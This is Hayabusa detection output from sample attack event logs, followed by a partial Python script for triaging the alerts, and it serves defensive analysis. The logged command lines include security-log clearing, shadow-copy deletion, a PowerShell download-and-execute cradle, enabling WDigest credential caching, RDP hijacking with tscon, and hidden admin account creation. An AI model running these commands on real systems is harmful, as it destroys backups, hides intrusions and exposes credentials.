2021-12-14 23:42:50.033 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.046 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.049 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-18 07:44:18.475 +09:00,FS03.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\reg.exe | PID: 2848 | PGUID: 7CF65FC7-12C2-61BD-EA04-000000001400",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0009-Collection/T1125-Video capture/ID13-RDP shadow session configuration enabled (registry).evtx 2021-12-19 23:33:08.147 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log 
Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete Window backup (webadmin).evtx
2021-12-19 23:48:19.294 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx
2021-12-19 23:48:21.231 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: wmic nteventlog where filename=""security"" cl | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0xff0 | User: admmig | LID: 0x542c77d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx
2021-12-19 23:51:04.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: wmic shadowcopy delete /nointeractive | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0x12c | User: admmig | LID: 0x542c77d,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx
2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,{$_.Delete();},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,high,Impact,Delete Volume Shadow Copies via WMI with PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
2021-12-20 00:13:49.026 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Shadowcopy"" CommandInvocation(ForEach-Object): ""ForEach-Object"" ParameterBinding(ForEach-Object): name=""Process""; value=""$_.Delete();""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
2021-12-20 00:13:49.026 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
2021-12-20 00:13:49.041 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
2022-01-07 07:27:21.255 +09:00,win10-02.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1204-User execution/ID4688-Edge payload download via command.evtx
2022-01-08 07:05:06.936 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: /c whoami | Path: C:\Windows\System32\cmd.exe | PID: 0xd7c | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: admmig | Tgt User: test10 | IP Addr: - | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Svr: localhost,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
2022-01-25 02:03:24.224 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: 3teamssixf$ | SID: S-1-5-21-2721507831-1374043488-2540227515-1008,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.004 +09:00,fs03vuln.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-2721507831-1374043488-2540227515-1008 | Group: Administrators | LID: 0x14f509e2,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.012 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg | Path: C:\Windows\regedit.exe | PID: 0x101c | User: admmig | LID: 0x14f509e2,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1586d8b2 | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | CreateKey: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | SetValue: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,high,Evas,Wdigest Enable UseLogonCredential,,../hayabusa-rules/sigma/registry_event/sysmon_wdigest_enable_uselogoncredential.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-02-09 05:33:10.918 +09:00,wef.windomain.local,4697,info,Persis,Service Installed,Name: rdphijack2 | Path: cmd.exe /k tscon 2 /dest rdp-tcp#14 | User: user | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1945c67,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
2022-02-09 05:33:15.166 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\tscon.exe | PID: 0x1b8c | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
2022-02-16 19:37:07.251 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:19.637 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 02694W-WIN10$ | Computer: - | IP Addr: 172.16.66.25 | LID: 0x567343,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567515,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: samir | Computer: 02694W-WIN10 | IP Addr: 172.16.66.25 | LID: 0x567515,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.520 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.521 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567758,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,info,,Process Created,"Cmd: ""C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe"" -dll C:\ProgramData\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | User: DESKTOP-TTEQ6PR\win10 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\win10\Desktop\SpoolFool-main' | LID: 0x277ef | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\4\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.328 +09:00,DESKTOP-TTEQ6PR,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,../hayabusa-rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
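The rows above are Hayabusa CSV output: one alert per record, with the Details column packed as `Key: value | Key: value` pairs and timestamps carrying a `+09:00` offset. As an added example (not code from the Hayabusa project or its rule set), the Python below parses a constructed, abbreviated copy of a few of these rows and performs three pivots an analyst otherwise does by hand: it ties each Security Log Cleared (1102) alert to the medium-or-higher alerts that follow on the same host, groups rows by Logon ID (LID) so that actions from one session stay together, and resolves the bare SID in a 4732 group-membership alert to the account name carried by the matching 4720. The RulePath and FilePath columns in the sample are shortened placeholders, and the 30-minute window and severity ordering are assumptions of the example, not Hayabusa settings.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: abbreviated copies of rows from the Hayabusa CSV above.
# Rule/file path columns are placeholders (r/..., f/...) to keep lines readable.
SAMPLE_CSV = r'''Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2021-12-19 23:48:19.294 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,r/1102.yml,f/clear.evtx
2021-12-19 23:48:21.231 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: wmic nteventlog where filename=""security"" cl | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0xff0 | User: admmig | LID: 0x542c77d",r/4688.yml,f/clear.evtx
2021-12-19 23:51:04.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: wmic shadowcopy delete /nointeractive | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0x12c | User: admmig | LID: 0x542c77d,r/4688.yml,f/vss.evtx
2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,high,Impact,Delete Volume Shadow Copies via WMI with PowerShell,,r/posh.yml,f/vss_ps.evtx
2022-01-25 02:03:24.224 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,r/1102.yml,f/hidden.evtx
2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: 3teamssixf$ | SID: S-1-5-21-2721507831-1374043488-2540227515-1008,r/4720.yml,f/hidden.evtx
2022-01-25 02:03:25.004 +09:00,fs03vuln.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-2721507831-1374043488-2540227515-1008 | Group: Administrators | LID: 0x14f509e2,r/4732.yml,f/hidden.evtx
2022-01-25 02:03:25.012 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg | Path: C:\Windows\regedit.exe | PID: 0x101c | User: admmig | LID: 0x14f509e2,r/4688.yml,f/hidden.evtx
2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,high,Evas,Wdigest Enable UseLogonCredential,,r/wdigest.yml,f/wdigest.evtx
2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,low,Exec,Process Start From Suspicious Folder,,r/susp.yml,f/spoolfool.evtx
'''

TS_FMT = "%Y-%m-%d %H:%M:%S.%f %z"          # Hayabusa timestamp with UTC offset
SEVERITY = {"info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}


def parse_details(details):
    """Split 'Key: value | Key: value' into a dict. Parts without a 'Key: '
    prefix (for example a raw script block) are ignored, and a value that
    itself contains ' | ' would be split too; that is acceptable for triage."""
    out = {}
    for part in details.split(" | "):
        key, sep, value = part.partition(": ")
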